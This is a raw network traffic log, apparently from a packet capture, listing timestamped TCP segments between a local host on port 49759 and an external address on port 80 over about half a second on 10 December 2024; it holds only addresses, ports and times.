Dec 10, 2024 00:42:38.998742104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.998775005 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.998817921 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.999804974 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.999851942 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.999907970 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.999952078 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.000891924 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.000937939 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.001007080 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.001054049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.001991034 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.002115965 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.002170086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.003118992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.003484011 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.003542900 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.004179955 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.004291058 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.004347086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.005254030 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.005317926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.005377054 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.006370068 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.006428003 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.006470919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.007071018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.007466078 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.007564068 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.007616043 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.110606909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.110713005 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.110766888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.110780001 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.111155987 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.111192942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.111207008 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.111224890 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.112292051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.112343073 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.112400055 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.112443924 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.113336086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.113404036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.146718979 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.146814108 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.146962881 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.147231102 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.147360086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.147412062 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.148298025 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.148344994 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.148349047 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.149390936 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.149441957 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.149638891 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.150454044 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.150501013 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.150573969 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.150619984 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.151616096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.151707888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.151756048 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.152607918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.152669907 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.152717113 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.153781891 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.153830051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.153888941 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.154820919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.154866934 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.154934883 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.155138969 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.156002998 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.156342983 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.156382084 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.157033920 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.157088995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.157135963 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.158102989 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.158153057 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.158209085 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.159081936 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.159178972 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.159219027 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.159291029 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.159334898 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.160285950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.160336018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.160388947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.161407948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.161448002 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.161526918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.162492990 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.162530899 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.162591934 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.162631989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.163623095 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.163712978 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.163799047 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.163855076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.164674044 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.164726973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.164793015 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.164876938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.165755033 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.165806055 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.165875912 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.165914059 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.166829109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.166886091 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.166954994 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.167059898 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.167969942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.168021917 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.168080091 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.168124914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.169059992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.169109106 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.169198036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.169240952 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.170208931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.170265913 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.170300007 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.170345068 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.171257019 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.171303034 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.171305895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.171354055 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.172323942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.172384977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.172444105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.172487020 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.173458099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.173501968 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.173513889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.173554897 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.174556017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.174611092 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.174657106 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.174705982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.175622940 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.175678015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.175715923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.175757885 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.176743031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.176796913 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.176853895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.176938057 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.177917004 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.177958965 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.177968025 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.177999973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.178915024 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.178972960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.179035902 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.179086924 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.179981947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.180027008 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.180105925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.180146933 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.181180954 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.181226969 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.181340933 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.181407928 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.182214022 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.182265043 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.182285070 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.182384968 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.183367014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.183377028 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.183412075 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.183424950 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.184387922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.184437037 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.184592009 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.184642076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.185487986 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.185542107 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.185573101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.185668945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.186593056 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.186642885 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.186722040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.186774969 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.187721968 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.187766075 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.187906981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.187977076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.188813925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.188873053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.188932896 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.188986063 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.189846039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.189897060 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.189927101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.190038919 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.190957069 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.191015959 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.191070080 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.191153049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.192156076 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.192222118 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.192257881 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.192341089 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.193145037 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.193197012 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.193243980 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.193293095 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.194236040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.194293022 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.194427013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.194478989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.195338011 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.195389986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.195446014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.195487976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.196419001 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.196472883 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.196511984 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.196552992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.197500944 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.197557926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.197571993 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.197608948 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.198613882 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.198669910 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.198719978 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.198810101 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.199709892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.199760914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.199776888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.199821949 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.303282022 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.303409100 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.303462982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.303827047 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.303920031 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.303972960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.304889917 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.304932117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.305020094 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.305994034 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.306034088 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.338809013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.338860035 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.338866949 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.338979006 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.339124918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.339176893 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.339256048 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.339299917 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.340173006 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.340236902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.340256929 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.340296984 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.341236115 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.341294050 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.341317892 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.341375113 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.342325926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.342593908 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.342636108 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.343419075 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.343672037 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.343717098 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.344542980 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.344587088 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.344625950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.345004082 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.345626116 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.345675945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.345763922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.345923901 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.346703053 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.346749067 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.346796989 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.346842051 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.347811937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.347872972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.347904921 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.348014116 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.348886013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.348997116 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.349050999 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.350014925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.350146055 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.350193977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.351113081 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.351156950 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.351237059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.351737976 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.352188110 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.352252960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.352294922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.352334023 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.353271008 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.353327036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.353580952 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.353631020 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.354368925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.354413986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.354480028 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.354528904 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.355474949 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.355549097 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.355659962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.355720997 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.356626987 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.356700897 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.356743097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.356792927 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.357678890 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.357791901 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.357852936 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.358746052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.358962059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.359034061 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.359846115 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.359963894 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.360063076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.360927105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.360981941 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.361042023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.361114979 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.362040997 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.362097979 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.362133980 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.362227917 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.363149881 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.363197088 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.363202095 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.363240957 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.364233971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.364284992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.364393950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.364460945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.365338087 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:39.365387917 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:39.365478992 CET	80	49759	185.215.113.16	192.168.2.4
